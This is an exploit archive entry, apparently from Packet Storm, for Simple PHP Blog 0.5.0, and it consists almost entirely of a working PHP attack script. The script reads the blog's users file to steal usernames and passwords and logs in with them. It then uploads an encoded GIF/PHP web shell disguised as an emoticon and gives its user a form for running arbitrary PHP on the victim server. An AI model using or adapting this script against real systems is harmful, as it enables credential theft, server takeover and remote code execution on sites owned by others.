sphpblog-exec.txt

2008-08-27T00:00:00
ID PACKETSTORM:69423
Type packetstorm
Reporter mAXzA
Modified 2008-08-27T00:00:00

Description

                                        
                                            `<?  
/*  
sIMPLE php bLOG 0.5.0 eXPLOIT  
bY mAXzA 2008  
*/  
function curl($url,$postvar){  
global $cook;  
$ch = curl_init( $url );  
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt ($ch, CURLOPT_HEADER, 1);  
curl_setopt ($ch, CURLOPT_REFERER,"$url");  
if (strlen($postvar)<3) $postvar="123";  
curl_setopt ($ch, CURLOPT_POSTFIELDS, $postvar);  
if (strlen($cook)>3)  
curl_setopt ($ch, CURLOPT_COOKIE, "$cook");  
$res = curl_exec ($ch);$err=curl_error ( $ch );if ($err) print "<hr>$err<hr>";  
curl_close($ch);  
return $res;  
}  
  
function error($msg){  
print "<hr>$msg<hr>\n<h1>Not Exploitable";exit;  
}  
  
extract($_POST);extract($_GET);  
  
print "<pre>URL:<form method=post><input size=80 name=url value=`$url`>";  
if (strlen($eval)>3){  
$eval=stripslashes($eval);  
print "\nEnter PHP Command:\n<textarea name=eval rows=10 cols=90>$eval</textarea>";  
print "<input type=submit value='Eval'></form>";  
$res=curl("$url/images/emoticons/sphp.php","z=$eval");  
$res=strstr($res,"GIF89a");  
print substr($res,41);exit;  
}  
  
if (strlen($url)>10)  
{  
print "\n<hr>Trying to Get /config/users.php...";flush();  
$res=curl($url."/config/users.php","");  
if (strstr($res,'|')) print "Done!\n\n$res";  
else error("\n\nUsername & Password Not Found\n\n$res");  
  
print "\n<hr>Trying to Get Username & Password...";flush();  
$res=str_replace("\r\n","\n",$res);  
$res=substr($res,strpos($res,"\n\n")+2);  
$line=explode("\n",$res);$n=count($line)-1;  
if ($n) {  
print "\nDone! Found - $n users:\n";  
for ($x=0;$x<$n;$x++){  
$up=explode("|",$line[$x]);$user[$x]=$up[1];$pass[$x]=substr($up[2],0,2);  
print "\nUsername - ".$up[1]."\tPassword - ".$up[2];  
}  
}  
  
print "\n<hr>Trying to Login...";flush();  
$postvar="user=$user[0]&pass=$pass[0]&";  
$res=curl($url."/login_cgi.php","$postvar");  
$cook=strstr($res,'Set-Cookie: sid=');  
$cook=substr($cook,12,strpos($cook,';')-12);  
if ($cook) print "\n\nDone... Cookie - $cook";else error("\n<h1>Error To Login</h1>\n\n\n$res");  
  
print "\n<hr>Trying to Upload Emoticon...";flush();  
$buf="R0lGODlhAQABAIAAAP///wAAACH5BAEUAAAALAAAAAABAAEAAAICRAE8PyBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1Rbel0pKTtleGl0Oz8+Ow==";  
if (@filesize('sphp.php')!=82){  
$f=fopen('sphp.php',"w");fwrite($f,base64_decode($buf));fclose($f);  
}  
$f=getcwd()."/sphp.php";  
$res=curl($url."/emoticons.php",array('user_emot'=>"@$f"));  
if (strstr($res,"Success!")) print "\n\nDone! Exploit path - $url/images/emoticons/sphp.php"; else error("\n<h1>Error To Upload</h1>\n\n\n$res");  
  
print "\n<hr>Trying to Exploit...";flush();  
$res=curl($url."/images/emoticons/sphp.php","z=print 20080824;");  
if (strstr($res,"20080824")) print "\n\nDone! Exploit Working!"; else error("\n<h1>Error To Exploit</h1>\n\n\n$res");  
  
print "\n<hr>Trying to Logout...";flush();  
$res=curl($url."/logout.php","");  
if (strstr($res,"You are now logged out")) print "\n\nDone!"; else error("\n<h1>Error To Logout</h1>\n\n\n$res");  
print "\nEnter PHP Command:\n<textarea name=eval rows=10 cols=90></textarea>";  
}  
print "<input type=submit ></form>";  
?>  
  
  
`